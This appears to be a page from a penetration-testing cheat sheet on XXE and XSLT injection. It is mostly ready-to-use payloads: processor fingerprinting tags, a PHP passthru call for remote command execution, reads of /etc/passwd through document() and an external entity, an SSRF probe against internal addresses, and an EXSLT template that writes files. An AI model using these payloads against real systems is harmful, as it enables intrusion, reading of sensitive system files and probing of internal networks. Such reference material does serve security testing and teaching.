XXE & XSLT Injection

XXE (XML External Entity) is a way to read arbitrary files, and XSLT files are a way to format XML files - these files are susceptible to injection which results in a number of various exploits

Preparation

Firstly, we can inject some tags to get information about the system

<xsl:value-of select="system-property('xsl:version')" />
<xsl:value-of select="system-property('xsl:vendor')" />
<xsl:value-of select="system-property('xsl:vendor-url')" />

RCE (Remote Code Execution)

One method of RCE available is when the backend is running PHP and has registerPHPfunctions enabled:

<xsl:value-of select="php:function('passthru', 'ls -al')" />

LFR (Local File Read)

Reading local files can be accomplished with the copy-of operator:

<xsl:copy-of select="document('/etc/passwd')" />

XXE

If we are able to control the XML data to be processed, we can inject some tags to get local file information:

// in our XML file:
<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "/etc/passwd">]>

// in our XSLT file:
INFO &ext_file;:

SSRF

<xsl:copy-of select="document('http://[internal ip]:[port]')"/>

Writing to Files

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exploit="http://exslt.org/common"
  extension-element-prefixes="exploit">
<xsl:template match="/">
    <exploit:document href="text.txt" method="text">
      testing
    </exploit:document>
</xsl:template>
</xsl:stylesheet>

PreviousAuthentication Attacks NextLocal File Inclusion

Last updated 1 month ago

hashtagPreparation

hashtagRCE (Remote Code Execution)

hashtagLFR (Local File Read)

hashtagXXE

hashtagSSRF

hashtagWriting to Files

Preparation

RCE (Remote Code Execution)

LFR (Local File Read)

XXE

SSRF

Writing to Files